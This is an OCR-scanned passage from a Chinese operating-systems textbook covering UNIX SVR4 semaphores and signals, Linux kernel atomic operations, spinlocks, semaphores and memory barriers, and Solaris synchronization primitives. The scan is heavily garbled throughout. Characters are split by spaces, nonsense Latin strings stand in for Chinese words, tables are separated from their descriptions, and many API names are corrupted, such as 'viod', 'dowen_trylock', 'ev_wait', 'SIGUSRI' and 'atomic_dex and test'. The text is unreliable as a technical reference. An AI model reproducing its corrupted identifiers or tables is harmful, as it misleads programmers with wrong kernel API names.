一 个 公共 内 存 块 。 进 程 读 写 共享 内 存 所 使 用 的 机 器 指令 与 读 写 虚拟 内 存 空间 的 其 他 部 分 所 使 用 的 


O 撒 父 子 关 系 。 一 一 译 者 注 
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指令 相同 。 每 个 进程 有 一 个 只 读 或 读 写 的 权限 。 互 斥 约束 不 属于 共享 内 存 机 制 的 一 部 分 , 但 必须 
由 使 用 共享 内 存 的 进程 提供 。 l 
6.7.4 Se 
UNIX System V 中 的 信号 量 系统 调用 是 对 第 5 章 中 所 定义 的 semWait 和 semSignal KiE 
的 推广 ,在 它们 上 面 可 以 同时 进行 多 个 操作 ,并 且 增 量 和 减 量 操作 的 值 可 以 大 于 1。 内 核 自动 完 
成 所 有 需要 的 操作 ， 在 所 有 操作 完成 前 ， 其 他 任何 进程 都 不 能 访问 该 信号 量 。 
一 个 信号 量 包含 以 下 元 素 : 
信号 量 的 当前 值 。 
在 信号 量 上 操作 的 最 后 一 个 进程 的 进程 ID。 
等 待 该 信号 量 的 值 大 于 当前 值 的 进程 数 。 
@ 等 待 该 信号 量 的 值 为 零 的 进程 数 。 
与 信号 量 相 关联 的 是 阻塞 在 该 信号 量 上 的 进程 队列 。 
信和 号 量 实际 上 是 以 集合 的 形式 创建 的 ,一 个 信号 量 集合 有 一 个 或 多 个 信号 量 。semct1 系统 
调用 允许 同时 设置 集合 中 所 有 信号 量 的 值 。 此 外 ，sem_op 系统 调用 把 一 系列 信号 量 操作 作为 参 
数 ， 每 个 操作 定义 在 集合 中 的 一 个 信号 量 上 。 当 进行 这 个 调用 时 ,内核 一 次 执行 一 个 操作 。 对 每 
个 操作 ， 它 的 实际 功能 由 sem op HEHE., THE sem_op 的 可 能 值 : 
@ 如 果 sem op 为 正 , 则 内 核 增加 信号 量 的 值 ， 并 唤醒 所 有 等 待 该 信号 量 的 值 增 加 的 进程 。 
© 如 果 sem_op 为 0, 则 内 核 检 查 信号 量 的 值 。 如 果 值 为 0, 则 继续 其 他 信和 号 量 操作 ; 否则 ， 
增加 等 待 该 值 为 0 的 进程 数目 ， 并 将 该 进程 挂 起 在 信号 量 值 等 于 0 的 这 个 事件 上 。 
@ WR sem op 为 负 ， 并 且 它 的 绝对 值 小 于 或 等 于 信号 量 的 值 ， 则 内 核 给 信号 量 的 值 加 上 
sem_op (一 个 负数 )。 如 果 结 果 为 0， 则 内 核 唤醒 所 有 等 待 信号 量 的 值 等 于 0 的 进程 。 
@ 如 果 sem op 为 负 ， 并 且 它 的 绝对 值 大 于 信和 号 量 的 值 ， 则 内 核 把 该 进程 阻塞 在 信和 号 量 的 
值 增加 这 一 事件 上 。 
这 个 对 信号 量 的 推广 为 进程 的 同步 与 协作 提供 了 相当 大 的 灵活 性 。 


6.7.5 ”信和 号 


信号 是 用 于 向 一 个 进程 通知 发 生 异 步 事件 的 机 制 。 信 和 号 类 似 于 硬件 中 断 ， 但 没有 优先 级 ， 
即 内 核 平 等 地 对 竺 所 有 的 信和 号。 对 于 同时 发 生 的 信号 , 一 次 只 给 进程 一 个 信号 ,而 没有 特定 的 
次 序 。 

进程 间 可 以 互相 发 送信 和 号, 内 核 也 可 能 在 内 部 发 送信 号 。 信 和 号 的 传递 是 通过 修改 信号 要 发 送 
到 的 进程 所 对 应 的 进程 表 中 的 一 个 域 来 完成 的 。 由 于 每 个 信号 只 保存 为 一 位 , 因此 不 能 对 给 定 类 
型 的 信号 进行 排队 。 只 有 在 进程 被 唤醒 继续 运行 时 , 或 者 进程 准备 从 系统 调用 中 返回 时 , 才 处 理 
信和 号。 进程 可 以 通过 执行 某 些 默认 行为 〈 如 终止 进程 )、 执 行 一 个 信号 处 理 函 数 或 者 忽略 该 信号 
来 对 信号 做 出 响应 。 

# 6.2 列 出 了 UNIX SVR4 中 定义 的 信和 号。 


表 6.2 UNIX 信号 












: 
SIGHUP BS; 当 内 核 认为 该 进程 的 用 户 正 在 做 
SIGINT 中 断 


无 用 工作 时 发 送 给 进程 
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03 SIGQUIT 停止 ;由 用 户 发 送 ， 用 于 引发 进程 停止 并 产生 信息 转 储 
04 SIGILL 非法 指令 

05 SIGTRAP 腿 踪 捕 提 ( trace trap); 触发 用 于 进程 跟踪 的 代码 的 执行 
06 SIGIOT IOT 指令 

07 SIGEMT EMT 指令 

08 SIGFPE 浮 点 异常 

09 SIGKILL 杀 死 ; 终止 进程 

10 SIGBUS 总 线 错 误 

11 SIGSEGV 段 违法 ;进程 试图 访问 其 虚 地址 空间 以 外 的 位 置 


12 SIGSYS 系统 调用 参数 错误 

13 SIGPIPE 在 没有 读 进 程 的 管道 上 写 

14 SIGALRM 警报 ; 当 一 个 进程 希望 在 一 段 时 间 后 收 到 一 个 信号 时 产生 
15 SIGTERM 软件 终止 


16 SIGUSRI 用 户 定义 的 信号 1 

17 SIGUSR2 用 户 定义 的 信号 2 

18 SIGCHLD 子 进程 死 

19 SIGPWR 电源 故障 ( power failure ) 


6.8 Linux 内 核 并 发 机 制 


Linux 包含 了 在 其 他 UNIX 系统 中 ( 如 SVR4 ) 出 现 的 所 有 并 发 机 制 ， 其 中 包括 管道 、 消 息 、 
共享 内 存 和 信号 。 除 此 之 外 ，Linux 2.6 还 包含 一 套 丰 富 的 并 发 机 制 ， 这 套 机 制 是 特别 为 内 核 态 
线程 准备 的 。 换 言 之 , 它们 是 用 在 内 核 中 的 并 发 机 制 ,为 内 核 代 码 提供 执行 时 的 并 发 性 。 本 节 将 
讨论 Linux 内 核 的 并 发 机 制 。 


6.8.1 原子 操作 


Linux 提供 了 一 组 操作 以 保证 对 变量 的 原子 操作 (atomic operations )。 这 些 操作 能 够 用 来 避 
免 简 单 的 竞争 条 件 〈race condition )。 原 子 操作 执行 时 不 会 被 打 断 或 和 干涉。 在 单 处 理 器 上 ， 线 程 
一 旦 启动 原子 操作 , 则 从 操作 开始 到 结束 的 这 段 时 间 内 , 线程 不 能 被 中 断 。 此 外 ,在 多 处 理 器 系 
统 中 ,该 原子 操作 所 针对 的 变量 是 被 锁 住 的 , 以 免 被 其 他 的 进程 访问 , 直到 此 原子 操作 执行 完毕 。 

在 Linux 中 定义 了 两 种 原子 操作 , 一 种 是 针对 整数 变量 的 整数 操作 , 一 种 是 针对 位 图 中 某 一 
位 的 位 图 操作 ， 如 表 6.3 所 示 。 这 些 操作 在 Linux 支持 的 任何 计算 机 体系 结构 中 都 需要 实现 。 在 
某 些 体系 结构 中 , 这 些 原子 操作 有 相对 应 的 汇编 指令 . 其 他 体系 结构 通过 锁 住 内 存 总 线 的 方式 来 
保证 操作 的 原子 性 。 

对 于 原子 整数 操作 (atomic integer operation )， 定 义 了 一 个 特殊 的 数据 类 型 atomic_t, JA 
子 整数 操作 仅 能 用 在 这 个 数据 类 型 上 ， 其 他 操作 不 允许 用 在 这 个 数据 类 型 上 。[LOVE04] 列 出 了 
这 些 严格 限制 的 好 处 : 

1) 对 于 在 某 些 情况 下 不 受 竞争 条 件 保 护 的 变量 ， 不 能 使 用 原子 操作 。 

2 ) 这 种 数据 类 型 的 变量 能 够 避免 被 不 恰当 的 非 原子 操作 使 用 。 

3 ) 编译 器 不 能 错误 地 优化 对 该 值 的 访问 ( 如 使 用 别名 而 不 使 用 正确 的 内 存 地 址 )。 

4) 这 种 数据 类 型 的 实现 隐藏 了 与 计算 机 体系 结构 相关 的 差异 。 

原子 整数 数据 类 型 的 典型 用 途 是 用 来 实现 计数 器 。 

原子 位 图 操作 (atomic bitmap operation ) 操作 由 指针 变量 指定 的 任意 一 块 内 存 区 域 的 位 序列 
中 的 某 一 位 。 因 此 没有 和 原子 整数 操作 中 atomic_t 等 同 的 数据 类 型 。 
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原子 操作 是 内 核 同 步 的 最 简 方法 。 更 复杂 的 锁 机 制 能 够 在 它 的 基础 上 构建 。 


表 6.3 Linux 原子 操作 





原子 整数 操作 

ATOMIC_INT(int i) 声明 ， 初 始 化 原子 变量 为 i 

int atomic_read(atomic_t *v) 读 整 数值 v 

void atomic_set(atomic_t*v, int i) K v 的 值 设置 为 整数 i 

void atomic_add(int i, atomic_t *v) vevti 

void atomic_sub(int i, atomic_t *v) v=v-i 

void atomic_inc(atomic_t *v) v=v+] 

void atomic_dec (atomic_t *v) v=v-1 

int atomic_sub_and_test (int I, atomic_t *v) vev-i; 如 果 值 为 0 则 返回 1， 和 否则 返回 0 

int atomic_add_negative(int I, atomic_t *v) vowels 如 果 值 为 负数 则 返回 1， 否 则 返回 0 ATK 

= > 一 MASE) 

int atomic_dex and test (atomic_t *v) v=v-1; 如 果 值 为 0 则 返回 1， 否则 返回 0 

int atomic_inc_and_text (atomic_t *v) v=v+1; 如 果 值 为 0 则 返回 1， 和 否则 返回 0 
原子 位 图 操作 

void set_bit(int nr, void *addr) 将 地 址 为 addr 的 位 图 的 第 nr 位 置 位 

viod clear_bit (int nr, viod *addr) 将 地 址 为 addr 的 位 图 的 第 nr 位 清 零 

void change bit (int nr,void *addr) 将 地 址 为 addr 的 位 图 的 第 nr 位 反 转 

iNt test_and_set_bit(int nr, vid *addr) 将 地 址 为 addr 的 位 图 的 第 nr 位 置 位 , 返回 以 前 的 值 


int test_and_clear_bit(int nr, void *addr) 将 地 址 为 addr 的 位 图 的 第 nr 位 清 零 , 返回 以 前 的 值 
int test and change bit (int vr, void *addr) 将 地 址 为 addr 的 位 图 的 第 nr 位 反 转 , 返回 以 前 的 值 
int test_bit(int nr, void *addr) 返回 地 址 为 addr 的 位 图 的 第 nr 位 的 值 


6.8.2 Fre st 


在 Linux 中 保护 临界 区 最 常见 的 技术 是 自 旋 锁 ( spinlock )。 在 同一 时 刻 ， 只 有 一 个 线程 能 获 
得 自 旋 锁 。 其 他 企图 获得 自 旋 锁 的 任何 线程 将 一 直 进 行 尝试 ( 即 自 旋 )， 直 到 获得 了 该 锁 。 本 质 
+, 自 旋 锁 建 立 在 内 存 区 中 的 一 个 整数 上 , 任何 线程 进入 临界 区 之 前 都 必须 检查 该 整数 。 如 果 该 
值 为 0%， 则 线程 设置 该 值 为 1， 然后 进入 临界 区 。 如 果 该 值 非 0， 则 该 线程 继续 检查 该 值 ， 直 到 
它 为 0。 自 旋 锁 很 容易 实现 , 但 有 一 个 缺点 , 即 在 锁 外 面 的 线程 以 忙 等 待 的 方式 继续 执行 。 因 此， 
自 旋 锁 在 获得 锁 所 需 的 等 待 时 间 较 短 时 , 即 等 待 时 间 少 于 两 次 上 下 文 切 换 时 间 时 , 就 会 很 高 效 。 

使 用 自 旋 锁 的 基本 形式 如 下 : 

spin_lock ( &lock ) 

/ + FR / 

spin_unlock ( &lock ) 
基本 的 自 旋 锁 

基本 的 自 旋 锁 (相对 于 后 面 将 要 讲 到 的 读 写 自 旋 锁 ) 有 如 下 4 个 版 本 ( 见 表 6.4): 

@ 普通 〈plain ): 如 果 临 界 区 代码 不 是 被 中 断 处 理 程序 执行 ,或 者 是 在 中 断 禁 用 的 情况 下 ， 

那么 可 以 使 用 普通 自 旋 锁 。 它 不 会 影响 当前 处 理 器 的 中 断 状态 。 
è irq: 如 果 中 断 一 直 被 启用 ， 那 么 可 以 使 用 这 种 自 旋 锁 。 
@ _irqsave: 如 果 不 知道 在 执行 时 间 内 中 断 是 否 启 用 ,那么 可 以 使 用 这 个 版 本 。 当 获得 锁 
时 ， 本 地 处 理 器 的 中 断 状态 就 保存 下 来 ， 当 该 锁 释 放 时 恢复 该 状态 。 

@ bh: 当 发 生 中 断 时 ， 相 应 的 中 断 处 理 器 只 处 理 最 少量 的 必要 工作 。 一 段 我 们 称 之 为 下 
ÆRE (bottom half) 的 代码 执行 中 断 相 关 工 作 的 其 他 部 分 ， 这 人 允许 尽快 地 启用 当前 的 中 
Bt. bh 自 旋 锁 用 来 禁用 和 启用 下 半 部 ， 以 避免 与 临界 区 冲突 。 
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表 6.4 Linux 自 旋 锁 





















名 称 


void spin locx(spinlock t *lock) 


说 明 
获得 指定 的 自 旋 锁 ， 一 直 自 旋 到 获得 该 锁 
和 spin_lock 相似 ， 同 时 也 关闭 本 地 处 理 器 上 的 中 断 


和 spin_lock_irq 相似 ， 同 时 也 保存 当前 的 中 断 状态 


和 spin_lock 相似 ， 同 时 也 关闭 所 有 下 半 部 的 执行 
释放 自 旋 锁 
释放 自 旋 锁 的 同时 启用 本 地 中 断 











vod spin lock irq(spinlock t *lock) 





void spin_lock_irqsave(spinlock_t *lock, 


unsigned long flags) 





void spin lock bh(spinlock t *lock) 








void spin_unlock(spinlock t *lock) 





void 





spin unlock irg(spinlock t *lock) 





void spin_unlock_irqrestore(spinlock_ t Cae Cea Peer Tes 


*lock, unsigned long flags) 








释放 自 旋 锁 的 同时 启用 下 半 部 
初始 化 自 旋 锁 
试图 获得 自 旋 锁 ， 如 果 该 锁 已 被 锁 住 ， 则 返回 非 0， 否 
则 返回 0 
如 果 自 旋 锁 目前 被 锁 住 ， 则 返回 非 0， 否 则 返回 0 


void spin unlock bh(spinlock t *lock) 








void spin lock init (spinlock t *lock) 





int spin_trylock(spinlock_t *lock) 








int spin is locked(spinlock t *lock) 


当 程 序 员 知道 需要 保护 的 数据 不 会 被 中 断 处 理 程序 或 下 半 部 访问 时 , 则 使 用 普通 自 旋 锁 。 否 
则 ， 就 需要 使 用 合适 的 非 普 通 自 旋 锁 。 

自 旋 锁 在 单 处 理 器 系统 和 多 处 理 器 系统 中 的 实现 是 不 同 的 。 对 于 单 处 理 器 系统 , 必须 考虑 如 
FAR: 是 否 关 闭 内 核 抢 占 〈 kernel preemption) 功能 。 如 果 关 闭 了 内 核 抢 占 功能 ， 此 时 线程 在 
内 核 模 式 下 运行 不 会 被 打 断 , 那么 锁 就 会 因为 没有 必要 使 用 而 在 编译 时 被 删除 。 如果 启用 内 核 抢 
占 ， 即 允许 打 断 内 核 模 式 线程 , 那么 自 旋 锁 仍然 会 被 编译 删除 ( 即 不 用 测试 自 旋 锁 内 存 区 是 否 发 
生变 化 )， 并 简单 地 实现 为 启用 中 断 /禁用 中 断 。 在 多 处 理 器 的 情况 下 ， 自 旋 锁 的 实现 (测试 自 旋 
锁 的 内 存 区 的 变化 ) 会 编译 进 内 核 代码 中 。 在 程序 中 使 用 自 旋 锁 机 制 时 , 可 不 必 考 虑 是 在 单 处 理 
器 上 运行 或 是 在 多 处 理 器 上 运行 。 

读 写 自 旋 锁 

读 写 自 旋 锁 ( reader-writer spinlock ) 机 制 允 许 在 内 核 中 实现 比 基 本 自 旋 锁 更 高 的 并 发 度 。 读 
写 自 旋 锁 允许 多 个 线程 同时 以 只 读 的 方式 访问 同一 数据 结构 ,只 有 当 一 个 线程 想 要 更 新 数据 结构 
时 ， 才 会 互 斥 地 访问 该 自 旋 锁 。 每 个 读 写 自 旋 锁 包括 一 个 24 位 的 读者 计数 和 一 个 解锁 标记 ， 解 
释 如 下 : 

计 数 标 记 解 # 

0 自 旋 锁 释放 ， 并 且 可 用 








1 
0 0 自 旋 锁 已 被 一 个 写 者 线程 获得 
n(n>0) 0 自 旋 锁 已 被 上 个 读者 线程 获得 
n(n>0) 1 无 效 





与 基本 的 自 旋 锁 相 似 ， 也 存在 着 读 写 自 旋 锁 的 普通 、_irg 和 irqsave 版 本 。 

相对 于 写 者 而 言 , 读 写 自 旋 锁 对 于 读者 更 为 有 利 一 些 。 如 果 自 旋 锁 被 读者 拥有 ， 只 要 至 少 一 
个 读者 拥有 该 锁 ，, 那么 写 者 就 不 能 抢占 该 锁 。 而 且 ， 即 使 已 经 有 写 者 在 等 待 该 锁 ， 新 来 的 读者 仍 
然 会 抢先 获得 该 自 旋 锁 。 


6.8.3 EE 


在 用 户 层 上 ，Linux 提供 了 和 UNIX SVR4 对 应 的 信号 量 (semaphore ) 接口 。 在 内 核 内 部 ， 
Linux 提供 了 供 自己 使 用 的 信号 量具 体 实现 ， 即 在 内 核 中 的 代码 能 够 调用 内 核 信 和 号 量 。 内 核 的 信 
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号 量 不 能 通过 系统 调用 直接 被 用 户 程 序 访问 。 内核 信号 量 是 作为 内 核 内 部 函数 实现 的 , 因此 比 用 
户 可 见 的 信号 量 更 加 高 效 。 
Linux 在 内 核 中 提供 了 三 种 信号 量 : 二 元 信号 量 ( binary semaphores )、 计 数 信号 量 ( counting 
semaphores ) 和 读 写 信号 量 (reader-writers emaphores )。 
二 元 信号 量 与 计数 信号 量 
Linux 2.6 中 定义 的 二 元 信和 号 量 和 计数 信号 量 ( 见 表 6.5) 和 第 5 章 描 述 的 信号 量 有 相同 的 功 
BE PAA down 和 up 分 别 用 于 第 5 章 中 提 到 的 semwait 和 semSignal MARX. 
计数 信号 量 使 用 sema_init 函数 初始 化 ， 该 函数 给 信号 量 命名 并 赋 初 值 。 二 元 信和 号 量 在 
Linux 中 也 称 为 MUTEX ( 互 斥 信号 量 )， 它 使 用 init_MUTEX 和 init_MUTEX_LOCKED ARH 
始 化 ， 这 两 个 函数 分 别 将 信号 量 初始 为 1 和 0。 
Linux 提供 了 三 种 版 本 的 down ( semwait ) 操作 。 
1) down 函数 对 应 于 传统 的 semWait 操作 。 也 就 是 线程 测试 信号 量 ,， 如果 信 号 量 不 可 用 就 
阻塞 。 当 在 信号 量 上 对 应 的 up 操作 发 生 时 ， 线 程 就 会 被 唤醒 。 需 要 注意 的 是 ， 该 函数 
既 可 以 用 于 计数 信号 量 上 的 操作 ， 也 可 以 用 于 二 元 信号 量 上 的 操作 。 
2 )down_interruptible K% A down 操作 而 被 阻塞 的 线程 在 此 期 间接 收 并 响应 内 核 
信号 。 如 果 线 程 被 信号 唤醒 ， 那 么 函数 down_interruptible 会 在 增加 信号 量 值 的 同 
时 返回 错误 代码 , 在 Linux 中 此 错误 代码 是 -BINTR。 这 会 告知 线程 对 信号 量 操作 的 调用 
已 取消 ( aborted )。 事 实 上 ,线程 已 经 被 强行 放弃 了 信和 号 量 。 这 个 特点 在 设备 驱动 程序 和 
其 他 服务 中 很 有 用 ， 因 为 这 样 可 更 加 方便 地 覆盖 信和 号 量 操作 。 
3 ) down_trylock 函数 可 在 不 被 阻塞 的 间 时 获得 信号 量 。 如 果 信 号 量 可 用 , 就 可 以 获得 它 。 
否则 函数 返回 一 个 非 零 值 ， 而 不 会 阻塞 该 线程 。 
读 写 信和 号 量 
读 写 信号 量 把 用 户 分 为 读者 和 写 者 ; 它 允 许多 个 并 发 的 读者 〈 没 有 写 者 ), 但 仅 允 许 一 个 写 
者 (没有 读者 )。 事 实 上 ， 对 于 读者 使 用 的 是 一 个 计数 信号 量 ， 而 对 于 写 者 使 用 的 是 一 个 二 元 信 
号 量 (MUTEX )。 表 6.5 显示 了 基本 的 读 写 信和 号 量 操作 。 由 于 读 写 信号 量 使 用 不 可 中 断 睡 眠 ,所 
以 对 于 每 个 down 操作 只 有 一 个 版 本 。 


#6.5 Linux 信号 量 
传统 信号 量 
void sema_init (struct semaphore *sem, int count) 初始 化 动态 创建 的 信号 量 值 为 给 定 的 count 
void init_MUTEX(struct semaphore *sem) 初始 化 动态 创建 的 信号 量 值 为 1( 初始 化 未 锁 住 ) 
void init_MUTEX_LOCKED(struct semaphore *sem) 初始 化 动态 创建 的 信和 号 量 值 为 0 (初始 化 锁 住 ) 
试图 获得 指定 的 信号 量 ， 如 果 信 号 量 不 可 得 ， 就 
进入 不 可 中 断 睡眠 
试图 获得 指定 的 信号 量 ， 如 果 信 和 号 量 不 可 得 ， 就 
int down_interruptible(struct semaphore *sem) | 进入 可 中 断 睡 眠 ,如 果 收 到 信号 而 不 是 up 操作 的 结 
果 ， 就 返回 值 -EINTR 
试图 获得 指定 的 信号 量 ， 如 果 信 号 量 不 可 得 ， 就 
返回 一 个 非 零 值 
void up (struct semaphore *sem) 释放 指定 的 信号 量 
读 写 信号 量 
void init rwsem(struct rw_semaphore, *rwsem) 初始 化 动态 创建 的 信号 量 为 1 
读者 down 操作 
读者 up 操作 
写 者 down 操作 
写 者 up 操作 


void down(struct semaphore *sem) 


int dowen_trylock(struct semaphore *sem) 





void down_read(struct rw_semaphore, *rwsem) 














up_read(struct rw_semaphore, *rwsem) 









down_write(struct rw_semaphore, *rwsem) 








void up_write(struct rw_semaphore, *rwsem) 
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6.8.4 屏障 


在 一 些 体系 结构 中 , 编译 器 或 者 处 理 器 硬件 为 了 优化 性 能 , 可 能 会 对 源 代 码 中 的 内 存 访问 重 
新 排序 。 重 新 排序 是 为 了 优化 对 处 理 器 指令 流水 线 的 使 用 。 重 新 排序 的 算法 包含 相应 的 检查 ， 以 
保证 数据 依赖 (data dependence) AA KAMA, Hon, (SB 

a = l; 

b = 1; 
可 被 重新 排序 ， 以 便 内 存 地 址 b 在 内 存 地 址 a 更 新 之 前 更 新 。 然 而 ， 代 码 


a= 1; 


b = a; 

不 能 重新 排序 。 即 使 如 此 , 在 某 些 情况 下 , 读 操 作 和 写 操作 以 指定 的 顺序 执行 是 相当 重要 的 ， 因 
为 这 些 信息 会 被 其 他 线程 或 者 硬件 设备 使 用 。 
为 了 保证 指令 执行 的 顺序 。Linux 提供 了 内 存 屏 麻 ( memory barrier) 设施 。 表 6.6 列 出 了 该 
设施 中 定义 的 最 重要 的 函数 。rmb () 操 作 保 证 了 在 代码 中 rmb () 以 前 的 代码 没有 任何 读 操 作 会 穿 
过 屏障 。 相 似 地 , wmb O 操作 保证 了 在 代码 wmb () 以 前 的 代码 没有 任何 写 操 作 会 穿 过 屏障 。 mb () 
操作 提供 了 装载 和 存储 屏障 。 
对 于 屏障 操作 ， 有 两 点 需要 注意 ， 
1 ) 屏障 和 机 器 指令 相关 ， 也 就 是 装载 和 存储 指令 。 因 此 ,高 级 语言 指令 azb 涉及 装载 ( 读 ) 
位 置 b 中 的 数据 并 存储 (BS) 到 位 置 a。 

2 ) rmb, wmb 和 mb 操作 阐述 了 编译 器 和 处 理 器 的 行为 。 在 编译 方面 ,屏障 操作 指示 编译 器 
在 编译 期 间 不 要 重新 排序 指令 。 在 处 理 器 方面 ， 屏 障 操作 指示 流水 线 上 任何 在 屏障 前 面 
的 指令 必须 在 屏障 后 面 的 指令 开始 执行 之 前 提交 。 

barrier () (FE mb () 操 作 的 一 个 轻 量 版 本 , 它 仅仅 控制 编译 器 的 行为 。 如 果 知 道 处 理 器 
不 会 执行 不 良 的 重新 排序 ,那么 这 个 操作 就 相当 有 用 了 。 比 如 Intel 的 x86 处 理 器 就 不 会 对 写 操 
作 重 新 排序 。 

smp_rmb, smp_wmb 和 emp mb 操作 提供 了 代码 的 优化 ， 它们 既 可 以 在 单 处 理 器 (UP) 上 
编译 ， 也 可 以 在 对 称 多 处 理 器 (SMP) 上 编译 。 对 于 SMP， 这 些 指 令 定 义 为 我 们 通常 所 说 的 内 
存 屏 障 ; 但 是 对 于 UP, 它们 都 仪 仅 作为 编译 器 屏障 有 些 数据 依赖 仅 在 SMP 环境 下 才 会 出 现 , 在 
处 理 这 些 数 据 依赖 时 ，smp_ 操 作 非 常 有 用 。 


表 6.6 Linux 内 存 屏 障 操作 





名 称 说 AA 
rmb () 阻止 跨 过 屏障 对 装载 (ioad ) 操作 进行 重 排序 
wmb () 阻止 跨 过 屏障 对 存储 操作 进行 重 排序 
mb () 阻止 跨 过 屏障 对 装载 /存储 操作 进行 重 排序 
barrier() 阻止 编译 器 跨 过 屏障 对 装载 /存储 操作 进行 重 排序 
smp_rmb() 在 SMP 上 ,提供 rmb0O 操 作 ， 在 UP 上 ， 提 供 barrier() 操 作 
smp_wmb () 在 SMP 上， 提供 wmb0O 操 作 ， 在 UP 上 ， 提 供 barrier HEE 
smp_mb () 在 SMP 上 ， 提 供 mb0O 操 作 ， 在 UP 上 ， 提 供 barrier() 操 作 


注 : SM 表示 对 称 多 处 理 器 ，UP 表示 单 处 理 器 。 


6.9 Solaris 线程 同步 原 语 


除了 UNIX SVR4 的 并 发 机 制 外 ，Solaris 还 支持 4 种 线程 同步 原 语 : 互 斥 锁 、 信 和 号 量 、 多 读 
者 单 写 者 锁 、 条 件 变量 。 


200 eB # # 


Solaris 在 内 核 中 为 内 核 线程 实现 这 些 原 语 ， 同 时 在 线程 库 中 也 为 用 户 级 线程 提供 这 些 原 语 。 
图 6.15 显示 了 这 些 原 语 的 数据 结构 。 原 语 的 初始 化 函数 填写 这 些 数 据 结构 的 一 些 成 员 。 一 且 创 
建 了 一 个 同步 对 象 ， 实 际 上 只 可 以 执行 两 个 操作 : 进入 (获得 锁 ) 和 释放 (解锁 )。 内 核 和 线程 
库 中 没有 实施 互 斥 和 防止 死 锁 的 机 制 。 如 果 一 个 线程 试图 访问 一 块 应 该 被 保护 的 数据 或 代码 , 但 
没有 使 用 正确 的 同步 原 语 , 那么 这 种 访问 也 能 发 生 。 如 果 一 个 线程 锁定 了 一 个 对 象 , 但 在 解锁 时 
失败 ， 那么 内 核 也 不 会 采取 任何 行动 。 

所 有 的 同步 原 语 都 要 求 存在 允许 对 象 在 一 个 原子 操作 中 被 测试 和 设置 的 硬件 指令 。 


Waiters (2 octets) 






| Type (octet) | 


Union (4 octets) 
(statistic 







Type-specific info (4 octets) 
(possibly a turnstile id, 
lock type 


c) 读者 / 写 者 锁 


d) 条 件 变量 





图 6.15 Solaris 同步 数据 结构 


6.9.1 BRR 

互 斥 锁 用 于 确保 在 同一 时 间 只 有 一 个 线程 能 访问 被 互 斥 锁 保 护 的 资源 。 锁 定 互 斥 量 的 线程 与 
解锁 互 斥 量 的 线程 必须 是 同一 个 线程 。 一 个 线程 通过 执行 mutex_enter 原 语 试图 获得 一 个 互 斥 
锁 。 如 果 mutex_enter 不 能 设置 锁 ( 因为 男 一 个 进程 已 经 设置 了 )， 则 阻塞 动作 将 取决 于 互 斥 
对 象 中 保存 的 专用 类 型 信息 。 默认 的 阻 蹇 策略 是 一 个 自 旋 锁 : 一 个 被 阻塞 的 线程 在 忙 等 待 循 环 中 
轮 询 锁 的 状态 。 还 有 一 个 基于 中 断 的 阻塞 机 制 可 供 选 择 。 对 后 一 种 情况 ， 互 斥 量 包 括 一 个 
turnstile ida， 用 来 标记 在 这 个 锁 上 睡眠 的 线程 队列 。 


与 互 斥 锁 相 关联 的 操作 如 下 所 示 : 
mutex enter ( ) RBA, 如 果 它 已 经 被 占有 则 可 能 阻塞 
mutex exit () 释放 锁 ， 可 能 解除 一 个 等 待 者 的 阻塞 


mutex tryenter () 获得 锁 ， 如 果 它 未 被 占有 
mutex_tryenter() 原 语 提 供 了 一 种 执行 互 斥 函数 的 无 阻塞 方法 。 这 使 得 程序 员 可 以 为 用 户 级 线程 使 
用 忙 等 待 的 方法 ， 从 而 避免 了 由 于 一 个 线程 被 阻塞 而 阻塞 整个 进程 。 


6.9.2 fash 
Solaris 通过 以 下 原 语 提供 经 典 的 计数 信号 量 : 
sema p(). 减 小 信号 量 ， 可 能 阻塞 该 线程 
sema v() 增加 信和 号 量 ， 可 能 为 一 个 等 待 线程 解除 阻塞 
sema_tryp ( ) 如 果 不 要 求 阻塞 ， 就 减 小 信号 量 


同样 ，sema_tryp () 原 语 允 许 忙 等 待 。 


BOR HE: LBRPUR 201 





、 ? 
6.9.3 多 读者 / 单 写 者 锁 Animation: Solaris RW Lock 
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有 读 线 程 后 ， 一 次 有 一 个 线程 作为 写 者 访问 该 对 象 。 当 做 为 写 者 获得 锁 时 ， 它 呈现 write lock 
RS: 所 有 试图 读 或 者 写 的 线程 都 必须 等 待 。 如 果 一 个 或 多 个 读 线 程 获得 了 该 锁 , 则 它 的 状态 为 
read lock。 原 语 如 下 : 


rw_enter ( ) 试图 作为 读者 或 写 者 获得 该 锁 

rw_exit () 作为 读者 或 写 者 释放 该 锁 

rw_tryenter ( ) 如 果 不 要 求 阻 塞 则 获得 锁 

rw_downgrade ( ) 一 个 已 经 获得 write lock 的 线程 把 它 转 换 成 read lock, 任何 正 在 等 待 的 写 线程 继续 
等 待 ， 直 到 该 线程 释放 锁 。 如 果 没 有 正在 等 待 的 写 线 程 ， 则 该 原 语 将 唤醒 任意 一 
个 挂 起 的 读 线程 


rw_tryupgrade ( ) 试图 把 reader lock 转换 成 writer lock 


6.9.4 条件 变量 


条 件 变量 用 于 等 待 直到 一 个 特定 的 条 件 为 真 ， 它 必须 和 互 斥 锁 联 合 使 用 ， 这 就 实现 了 如 图 
6.14 所 示 的 类 型 的 管 程 。 原 语 如 下 : 

ev_wait () 阻塞 直到 该 条 件 的 信号 通知 

cv_signal ( ) 唤醒 阻塞 在 cv wait () 上 的 一 个 线程 

ev_broadcast ( ) 唤醒 阻塞 在 cv wait () 上 的 所 有 线程 

ev_wait () 在 阻塞 前 释放 关联 的 互 斥 锁 ， 并 在 返回 前 重新 获得 互 斥 锁 。 由 于 重新 获得 互 斥 锁 可 能 被 另 一 
个 等 待 这 个 互 斥 锁 的 线程 阻塞 ， 所 以 必须 重新 测试 引发 等 待 的 条 件 。 因 此 ， 典 型 
的 用 法 如 下 : 

mutex_enter ( &m) 


kk 
while (some_condition) { 
ev_wait ( &cv,&m) ; 


} 


ak 


mutex _exit (em) ; 


因为 条 件 受 互 斥 锁 的 保护 ， 所 以 这 里 允许 条 件 是 一 个 复杂 的 表达 式 。 


6.10 Windows 并 发 机 制 


Windows 提供 了 线程 间 的 同步 , 并 把 它 作 为 对 象 结构 中 的 一 部 分 。 最 重要 的 同步 方法 包括 执 
行 体 分 派 器 对 象 、 用 户 态 临界 区 、 轻 量 级 读 写 锁 和 条 件 变量 。 分 派 器 对 象 利 用 了 等 待 函数 。 我 们 
将 首先 撒 述 等 待 函数 ， 随 后 描述 同步 方法 。 


6.10.1 等 待 函数 


等 待 函 数 允 许 线 程 阻塞 其 自身 的 执行 。 等 待 函数 只 有 在 特定 的 条 件 满 足 后 才 会 返回 。 等 待 函 
数 的 类 型 决定 了 所 使 用 的 一 套 标 准 。 当 等 待 函数 被 调用 时 , 它 检查 等 待 的 条 件 是 否 已 满足 。 如 果 
